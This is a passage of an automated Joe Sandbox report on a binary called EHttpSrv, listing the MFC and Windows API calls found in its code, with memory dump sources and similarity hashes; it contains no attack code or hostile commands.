                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E6A4
                                                                                                                • #310.MFC80U ref: 2045E6D9
                                                                                                                • #4026.MFC80U(00000074), ref: 2045E6EE
                                                                                                                • #310.MFC80U ref: 2045E6F8
                                                                                                                • #4026.MFC80U(00000075), ref: 2045E70C
                                                                                                                • #4098.MFC80U(FEEA6C22,?,00000030), ref: 2045E720
                                                                                                                • #578.MFC80U(FEEA6C22,?,00000030), ref: 2045E730
                                                                                                                • #578.MFC80U ref: 2045E742
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E7A5
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2045E7C3
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E81F
                                                                                                                • wcsncpy_s.MSVCR80 ref: 2045E836
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 2045E87D
                                                                                                                • #3873.MFC80U(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E897
                                                                                                                • #5869.MFC80U(00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E8B6
                                                                                                                • #5869.MFC80U(00000000,00000002,?,00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E8C8
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000002,?,00000000,00000001,?,00000001,00000000), ref: 2045E8E1
                                                                                                                • wcscpy_s.MSVCR80 ref: 2045E944
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 2045E9CF
                                                                                                                • #3873.MFC80U(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045E9E9
                                                                                                                • #5869.MFC80U(00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045EA08
                                                                                                                • #5869.MFC80U(00000000,00000002,?,00000000,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 2045EA1A
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000002,?,00000000,00000001,?,00000001,00000000), ref: 2045EA33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#578#5869wcscpy_s$#3873#4026#5862#6735MessageSendwcsncpy_s$#1476#2011#359#3828#3998#4098#5832#607memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 620450143-0
                                                                                                                • Opcode ID: be2954b327063b7d8bab526f765a60996450f9a67c5c262b95022e75a6c224ab
                                                                                                                • Instruction ID: 2ace1d11d9b7c476054775e1a2a1a61a5e23e676c5184643b28d972a46399677
                                                                                                                • Opcode Fuzzy Hash: be2954b327063b7d8bab526f765a60996450f9a67c5c262b95022e75a6c224ab
                                                                                                                • Instruction Fuzzy Hash: B5D1C0712487409BE324CB54CC82F9BB7E5FF98B04F14891CF69A9B2D1DB78A908C756
                                                                                                                APIs
                                                                                                                • #516.MFC80U(00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6,000000FF,204708CB,?,?,?,?), ref: 2045FDF4
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE3E
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000257,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,00000000,?,2047DBB6), ref: 2045FE50
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 2045FEB5
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045FEBA
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FEBF
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045FEC6
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FED4
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 2045FEF3
                                                                                                                • DestroyCursor.USER32(?), ref: 2045FF1E
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF07
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 2045FF2F
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 2045FF34
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF39
                                                                                                                • GetSysColor.USER32(00000005), ref: 2045FF40
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF4E
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF60
                                                                                                                • #1058.MFC80U(00000171,0000000E,00000171,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF71
                                                                                                                • LoadIconW.USER32(00000000,00000171), ref: 2045FF77
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF83
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FF95
                                                                                                                • #1058.MFC80U(0000016F,0000000E,0000016F,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFA6
                                                                                                                • LoadIconW.USER32(00000000,0000016F), ref: 2045FFAC
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFB8
                                                                                                                • #1079.MFC80U(?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFCA
                                                                                                                • #1058.MFC80U(00000172,0000000E,00000172,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFDB
                                                                                                                • LoadIconW.USER32(00000000,00000172), ref: 2045FFE1
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 2045FFED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$Load$IconMetricsSystem$#1058$#1555#310#416#557#6749ColorCursor$#1176#516#530#572#6003DestroyEmptyRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 365691172-0
                                                                                                                • Opcode ID: b68f33bef7c4b2d6117d4029ba62b2bec84fb5b55f27a9dde17b4a188a7d711b
                                                                                                                • Instruction ID: fed8fed39bf988fa6bdc90078e62ecdff316e1d07a83c31df6cb4852490efdad
                                                                                                                • Opcode Fuzzy Hash: b68f33bef7c4b2d6117d4029ba62b2bec84fb5b55f27a9dde17b4a188a7d711b
                                                                                                                • Instruction Fuzzy Hash: 8951D670244741AFD220DBB4CC42FAB77E9AF99B18F01C91CF6555B2D1DEB8A804CB61
                                                                                                                APIs
                                                                                                                • #4574.MFC80U(FEEA6C22), ref: 204249E5
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 204249F5
                                                                                                                • #4026.MFC80U(000000C5), ref: 20424A0D
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20424A2B
                                                                                                                • SendMessageW.USER32(?,0000014A,00000000,?), ref: 20424A3F
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 20424A80
                                                                                                                • SendMessageW.USER32(?,0000014A,00000001,?), ref: 20424AB2
                                                                                                                • #310.MFC80U ref: 20424AF4
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424B10
                                                                                                                • #6063.MFC80U(?), ref: 20424B24
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424B7F
                                                                                                                • #6063.MFC80U(20485878), ref: 20424B8C
                                                                                                                • #2311.MFC80U(?,2048587C,?,20485878), ref: 20424B9F
                                                                                                                • #6063.MFC80U(?), ref: 20424BB3
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424C0F
                                                                                                                • #6063.MFC80U(20485878), ref: 20424C1C
                                                                                                                • #578.MFC80U ref: 20424C2D
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424C4D
                                                                                                                • #6063.MFC80U(?), ref: 20424C79
                                                                                                                • SendMessageW.USER32(?,0000014E,00000001,00000000), ref: 20424C9B
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424CD6
                                                                                                                • #6063.MFC80U(20485878), ref: 20424CE3
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424CF3
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 20424D08
                                                                                                                • #6063.MFC80U(20485878), ref: 20424D15
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424D25
                                                                                                                • #578.MFC80U(20485878,20485878), ref: 20424D3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#6063$#2311#310#578$#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 862278329-0
                                                                                                                • Opcode ID: 33ffcb5ef148fcbb47d6eda2bfc9d0609dc9160fafeb3dc740121320e5d8c93d
                                                                                                                • Instruction ID: 9710f64e217feda51601e01967b19a54b8f6438b9182b9ff69744ec8206c4091
                                                                                                                • Opcode Fuzzy Hash: 33ffcb5ef148fcbb47d6eda2bfc9d0609dc9160fafeb3dc740121320e5d8c93d
                                                                                                                • Instruction Fuzzy Hash: 13A1F172A086459FDB24CF50CC80FEB77A9FB94708F40CA2DF9445B2A0DB78A904CB81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310freememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2345624133-0
                                                                                                                • Opcode ID: c5c49032eacd65ffb0fba4c6bfb47e0403574072856f95f4a8a5a6116a251bd9
                                                                                                                • Instruction ID: 2dc2b5980879ddb9e75c8cf977c6fce2ff5e67cbf9f60d5e2776d79c249a8b46
                                                                                                                • Opcode Fuzzy Hash: c5c49032eacd65ffb0fba4c6bfb47e0403574072856f95f4a8a5a6116a251bd9
                                                                                                                • Instruction Fuzzy Hash: 51A160715087409FD321DF64CC85A9FBBE8BF98748F10892DF59597290DB78AA08CF92
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,2045BB76,00000000), ref: 2045BC95
                                                                                                                • #2651.MFC80U(000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCAA
                                                                                                                • #2155.MFC80U(000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCB1
                                                                                                                • #2651.MFC80U(000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCDD
                                                                                                                • #2155.MFC80U(000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCE4
                                                                                                                • #2651.MFC80U(000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD0D
                                                                                                                • #2155.MFC80U(000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD14
                                                                                                                • #2651.MFC80U(0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD3D
                                                                                                                • #2155.MFC80U(0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD44
                                                                                                                • #2651.MFC80U(0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD6D
                                                                                                                • #2155.MFC80U(0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD74
                                                                                                                • #2651.MFC80U(000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD9D
                                                                                                                • #2155.MFC80U(000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BDA4
                                                                                                                • #2651.MFC80U(000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001), ref: 2045BDCD
                                                                                                                • #2155.MFC80U(000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001), ref: 2045BDD4
                                                                                                                • #2651.MFC80U(00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA), ref: 2045BDFD
                                                                                                                • #2155.MFC80U(00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA), ref: 2045BE04
                                                                                                                • #2651.MFC80U(0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000), ref: 2045BE2D
                                                                                                                • #2155.MFC80U(0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000), ref: 2045BE34
                                                                                                                • #2651.MFC80U(00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000), ref: 2045BE5D
                                                                                                                • #2155.MFC80U(00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000), ref: 2045BE64
                                                                                                                • #2651.MFC80U(000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000), ref: 2045BE8D
                                                                                                                • #2155.MFC80U(000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000), ref: 2045BE94
                                                                                                                • #2651.MFC80U(000003F7,00000000,000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000), ref: 2045BEBD
                                                                                                                • #2155.MFC80U(000003F7,00000000,000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000), ref: 2045BEC4
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: ca8e1ed99d81f434f37c292f8f8f875fe7784e7371d240e8cad493a35e0ae36c
                                                                                                                • Instruction ID: 38f6c668d6cd52d4b7cd920b451560f76b3907829b54d84714045b9418710d8b
                                                                                                                • Opcode Fuzzy Hash: ca8e1ed99d81f434f37c292f8f8f875fe7784e7371d240e8cad493a35e0ae36c
                                                                                                                • Instruction Fuzzy Hash: 77510EB0744600DFEA1287A48812BFE35F5EBA1B04F40C57DB6468B6E0DBBC9C86C785
                                                                                                                APIs
                                                                                                                • #347.MFC80U(FEEA6C22), ref: 20433802
                                                                                                                • #1270.MFC80U(?,FEEA6C22), ref: 20433818
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 20433826
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 2043382F
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 2043383E
                                                                                                                • #1270.MFC80U(00000000), ref: 20433849
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 2043385A
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20433895
                                                                                                                • #1271.MFC80U(00000000), ref: 204338A0
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 204338AF
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 204338BE
                                                                                                                • #2362.MFC80U(00000000), ref: 204338C5
                                                                                                                • #5638.MFC80U(00000000,00000000), ref: 204338CF
                                                                                                                • GetMapMode.GDI32(?,00000000,00000000), ref: 204338DD
                                                                                                                • #5884.MFC80U(00000000), ref: 204338E8
                                                                                                                • GetBkColor.GDI32(?), ref: 204338F2
                                                                                                                • #5723.MFC80U(00000000), ref: 204338FD
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 2043390E
                                                                                                                • #6058.MFC80U(?,?,?), ref: 20433927
                                                                                                                  • Part of subcall function 20432000: GetClientRect.USER32(?,?), ref: 20432013
                                                                                                                  • Part of subcall function 20432000: GetParent.USER32(?), ref: 2043201D
                                                                                                                  • Part of subcall function 20432000: #2366.MFC80U(00000000), ref: 20432024
                                                                                                                  • Part of subcall function 20432000: GetTextColor.GDI32(?), ref: 20432076
                                                                                                                  • Part of subcall function 20432000: #2362.MFC80U(00000000), ref: 20432085
                                                                                                                  • Part of subcall function 20432000: FillRect.USER32(?,?,00000000), ref: 2043209C
                                                                                                                  • Part of subcall function 20432000: InflateRect.USER32(?,000000FE,00000000), ref: 204320DC
                                                                                                                  • Part of subcall function 20432000: #5727.MFC80U(00000001), ref: 20432108
                                                                                                                  • Part of subcall function 20432000: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20432129
                                                                                                                  • Part of subcall function 20432000: #2362.MFC80U(00000000), ref: 20432130
                                                                                                                  • Part of subcall function 20432000: #764.MFC80U(?), ref: 2043214F
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 2043395F
                                                                                                                • #5638.MFC80U(FEEA6C22), ref: 2043396E
                                                                                                                • #5633.MFC80U(?,00000000,FEEA6C22), ref: 20433980
                                                                                                                • #1957.MFC80U(?,00000000,FEEA6C22), ref: 20433989
                                                                                                                • #602.MFC80U(?,00000000,FEEA6C22), ref: 204339B2
                                                                                                                • #602.MFC80U(?,00000000,FEEA6C22), ref: 204339C3
                                                                                                                Similarity
                                                                                                                • API ID: #2362Rect$#1270#347#5633#5638#602ColorCompatibleCreateMessageSend$#1271#1957#2366#2521#5723#5727#5884#6058#764BitmapClientFillInflateModeParentText
                                                                                                                • String ID:
                                                                                                                • API String ID: 460726100-0
                                                                                                                • Opcode ID: 983a7ba65ae64c1b04ff5d34bf4deebc936cefbe968e1a89bbeec2a3a1087208
                                                                                                                • Instruction ID: d6db3167796e3342b51db567698fae97f9d31cccc33f840bdf94e3c8e033f85d
                                                                                                                • Opcode Fuzzy Hash: 983a7ba65ae64c1b04ff5d34bf4deebc936cefbe968e1a89bbeec2a3a1087208
                                                                                                                • Instruction Fuzzy Hash: 6E51FC71108340AFC304DBA4C895EAFBBF9AF99A54F408A1DF59693260DB75E904CB62
                                                                                                                APIs
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FB3
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FCF
                                                                                                                • #764.MFC80U(B27AE934,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FF1
                                                                                                                • #764.MFC80U(E95CC083,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 2041500A
                                                                                                                • #764.MFC80U(E8C833FC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415026
                                                                                                                • #764.MFC80U(84050445,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415048
                                                                                                                • #764.MFC80U(F9B36FE9,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415061
                                                                                                                • #764.MFC80U(00C00504,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 2041507D
                                                                                                                • #764.MFC80U(FFF9B4F8,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 204150A2
                                                                                                                • #764.MFC80U(49BA00B8,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 204150C7
                                                                                                                • qsort.MSVCR80 ref: 20415100
                                                                                                                • qsort.MSVCR80 ref: 2041515C
                                                                                                                • qsort.MSVCR80 ref: 20415186
                                                                                                                • qsort.MSVCR80 ref: 204151AE
                                                                                                                • qsort.MSVCR80 ref: 20415212
                                                                                                                • qsort.MSVCR80 ref: 2041523C
                                                                                                                • qsort.MSVCR80 ref: 20415266
                                                                                                                • qsort.MSVCR80 ref: 2041529D
                                                                                                                • qsort.MSVCR80 ref: 204152D4
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415326
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415393
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415403
                                                                                                                • wcscpy_s.MSVCR80 ref: 20415468
                                                                                                                • wcsncpy_s.MSVCR80 ref: 20415479
                                                                                                                Similarity
                                                                                                                • API ID: #764$qsort$#265$wcscpy_swcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1349739470-0
                                                                                                                • Opcode ID: 0d64cb7775e3551ef22c9dbd3f46ef24d3e0b69c6ce68da3e20f114f03e825c8
                                                                                                                • Instruction ID: a5f4eebaf3f9ca9ad693deaebe895098fcba689132a65306b19b38adc85e5150
                                                                                                                • Opcode Fuzzy Hash: 0d64cb7775e3551ef22c9dbd3f46ef24d3e0b69c6ce68da3e20f114f03e825c8
                                                                                                                • Instruction Fuzzy Hash: 96224AB0500288CBDB24CF69CC81BDAFBE5FF94304F548A1AE8599B361D779A944CF51
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?), ref: 2044A728
                                                                                                                • #2310.MFC80U(?,00000251,00000000,?,00000022), ref: 2044A7C2
                                                                                                                • #2310.MFC80U(?,00000252,?), ref: 2044A7D8
                                                                                                                • #896.MFC80U(?), ref: 2044A7E9
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A7F6
                                                                                                                • #2310.MFC80U(?,00000253,?,?,00000001), ref: 2044A894
                                                                                                                • #2310.MFC80U(?,0000025A,00000000,00000001), ref: 2044A8B1
                                                                                                                • #896.MFC80U(?), ref: 2044A8C2
                                                                                                                • #2310.MFC80U(?,00000254,-00000022,?,00000001), ref: 2044A96C
                                                                                                                • #896.MFC80U(?), ref: 2044A99C
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A9A9
                                                                                                                • #2310.MFC80U(?,00000255,00000000,?,00000022), ref: 2044A9E7
                                                                                                                • #2310.MFC80U(?,00000256,?), ref: 2044AA08
                                                                                                                • #896.MFC80U(?), ref: 2044AA18
                                                                                                                • #2310.MFC80U(?,00000257,00000000,?,00000022), ref: 2044AA58
                                                                                                                • #2310.MFC80U(?,00000258,?), ref: 2044AA75
                                                                                                                • #896.MFC80U(?), ref: 2044AA8B
                                                                                                                • #2310.MFC80U(00000000,0000024F,?,?,?,00000000,?,00000040,00000000,?,?,00000040), ref: 2044AAEE
                                                                                                                • #896.MFC80U(?), ref: 2044AAFA
                                                                                                                • #2310.MFC80U(00000000,0000025C,?,?,?,00000000,?,00000040,?,FEEA6C22,?,00000040), ref: 2044AB5D
                                                                                                                • #896.MFC80U(?), ref: 2044AB69
                                                                                                                • #899.MFC80U(2048E708), ref: 2044AB87
                                                                                                                • #578.MFC80U ref: 2044ABA1
                                                                                                                Similarity
                                                                                                                • API ID: #2310$#896$CriticalSection$#310#578#899EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 4130951986-0
